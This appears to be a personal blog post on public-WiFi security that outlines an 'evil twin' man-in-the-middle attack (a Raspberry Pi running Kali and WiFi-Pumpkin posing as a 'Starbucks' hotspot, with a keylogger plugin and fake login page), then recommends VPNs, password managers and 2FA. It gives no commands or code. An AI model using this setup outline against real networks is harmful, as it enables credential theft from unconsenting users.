All aspects interest me, from cyberactivism (‘hacktivism’) to elaborate military cyberattacks that sabotage nuclear weapon production via the destruction of centrifuges (Stuxnet). Today I hope to give you an idea of how easy it is to have your identity stolen along with a practical few first steps to improve your digital security. I’ll go into the basics of a man-in-the-middle attack using a Pumpkin Pi as a Rogue AP, to show you just how easy it is with some basic knowledge.
Defining Vulnerabilities & Exploits
In CyberSec, a vulnerability is a weakness of some-type that can be exploited by a threat actor(attacker).
An exploit can be code that takes advantage of a vulnerability to execute an attack.
“Owned”: Owned is a slang word that originated among 1990s hackers, where it referred to “rooting” or gaining administrative control over someone else’s computer.
On Public WiFi? Use a VPN or else.
VPN stands for Virtual Private Network, essentially a VPN creates a secure tunnel from your computer to the internet, adding a layer of security and privacy. This is extremely important when using public WiFi, as I’m about to show you how a trip to Starbucks could end in your identity being compromised via a man-in-the-middle attack.
What’s a Man-in-the-Middle Attack?
A man-the-the-middle (MITM) attack is essentially an attack where the attacker eavesdrops on your connection, intercepting your data and potentially capturing log-in credentials, banking information, and more. Using a VPN can protect your internet traffic from being snooped on by an attacker.
Choosing a VPN
ExpressVPN: I currently use ExpressVPN, the Android app has a feature where you can choose to connect to a VPN whenever you’re not on a network you trust (NordVPN seems to have possibly dropped this feature). It’s widely considered one of the best VPNs you can get.
“[ExpressVPN is] The best all-round VPN service for speed, privacy and unblocking “ — TechRadar 2019
NordVPN: I also used to recommend NordVPN, although I no longer use their service after a server breach earlier this year; Nord kept the breach secret for months until a security researcher pressured them to disclose via twitter. Hacks are to be expected, but it’s the misleading marketing as ‘most secure VPN’ and lack of transparency makes ExpressVPN the clear choice.
The ‘Evil Twin’ Starbucks Attack Example
Knowing how attacks work is a crucial part of educating people who want to learn & potentially work in CyberSec. BUT, I do NOT encourage/promote/endorse illegal activities, IN ANY WAY. If you’re in a public place and want to experiment (especially if you’re naming an open network AP something misleading like ‘Starbucks’): MAKE SURE YOU HAVE LEGAL PERMISSION TO DO SO, otherwise: unconsenting phones could connect to it, which is potentially illegal (and not cool). Again, this is for CyberSecurity educational purposes only.
All the attacker needs is a bit of familiarity with the bash command line, a $35 Raspberry Pi with Kali Linux installed, a wireless network adaptor (roughly $25), and WiFi-Pumpkin installed.
Here’s a photo of my Raspberry PI running Kali Linux, notice it doesn’t have the wireless network adapter. (If you haven’t heard of Raspberry Pi’s potential, check these project ideas out.)
The attacker configures their rogue access point to have the SSID set to “Starbucks” and configures it to be an open unsecured network (allowing random potential victim devices to auto-connect).
Let’s say you go into Starbucks, you sit down after getting your venti Toasted White Chocolate Mocha Frappuccino, and open up your laptop. Your computer automatically connects to the attackers rogue Starbucks, and as far as you know, you’re connected “privately”. Also, attackers can easily create a fake login page as well, one that looks just like the Starbucks login. You decide to check your bank account, and everything seems to be normal…but across the room, a nefarious person is listening in.
The attacker could easily use Pumpkin-Proxy plugins like keylogger; now they’ve got that password you use for way too many websites. Even if your password was amazingly well thought out, they would still have it, because it logs your keystrokes.
You’ve Just Been Owned.
Your identity and data: compromised, your SSN, DOB, credit card numbers, medical records, your most personal data: all on sale to the highest bidder on the dark web, on some
From there, the hacker can use that malicious script they injected as an entry point to install a remote access trojan (RAT) into your system. The hacker now can now access your system whenever they want, wherever they want, totally undetected. They can control/access your live web-cam, your live screen, hard-drive contents, your keystrokes, etc.
Even once you’ve disconnected from the attacker’s evil twin network and you’ve gone home, you’re still compromised. The hacker can still access everything because they installed a back-door into your system earlier.
They could take full control of your computer and install ransomware.
What is Ransomware?
Ransomware is a type of malware, designed to deny access to a computer system or data until a ransom is paid. This is under threat of never decrypting your data (meaning you’re never getting your data back) or public release of sensitive data.
What You Can Do: 2FA, VPNs, and Password Managers
So now that I’ve got you sufficiently paranoid, I have some good news: there’s something you can do.
As mentioned earlier: use a VPN when on unsecured networks. This can make it so the man in the middle attack isn’t successful. It creates a secure tunnel between your device and the VPN server, making your personal data much more secure.
And are you somebody that re-uses passwords on multiple sites? That’s a huge NO-NO. Sign up for a password manager (like LastPass), then you can use a super-secure password (that you can remember) to keep all your other passwords safe. And many password managers have secure password generators, so you only have to remember that one master password. You can also use 2-Factor Authentication (2FA) to secure your password manager.
What is 2FA? Getting Started with Two-Factor Authentication
2FA is a security process that involves a user providing two factors of authentication. SMS 2FA is not recommended due to vulnerabilities like SIM jacking making it less secure, but it’s better than nothing. I personally use a YubiKey FIDO U2F USB micro.
Two-Factor requires a potential bad actor to first sign in with my secure password, then they’re prompted to insert + hold their finger on the physical USB authentication key, which only I have. This USB is verified by an encrypted token that can be re-generated and re-configured via YubiCo software. I also have my YubiKey and computer credentials setup to allow PIV(smart card) , so I can optionally log-in to my 2018 MacBook Pro via YubiKey insertion, followed by typing in a PIN; as an alternative to the biometric sensor.
If you don’t want to spend money on a USB key, use an app like Google Authenticator, or Authy. I use a 2FA app as a backup for some of my accounts, these work similarly to the USB key, after entering the initial password; you’re instead prompted to enter the time-sensitive 6 digit code from your authentication app of choice. Most 2FA apps use a Time-based One-time Password Algorithm (TOTP), regenerating new keys frequently and regularly. I prefer LastPass authenticator as it solves the very real issue of what happens if you lose your phone with all your 2FA codes on it, which is a miserable experience that I have dealt with before. LastPass Authenticator backs up your 2FA configuration securely and as a bonus, the LastPass password manager integrates smoothly with it.
I hope this blog post was both fascinating and educational, and I’ve included some great resources below for further reference.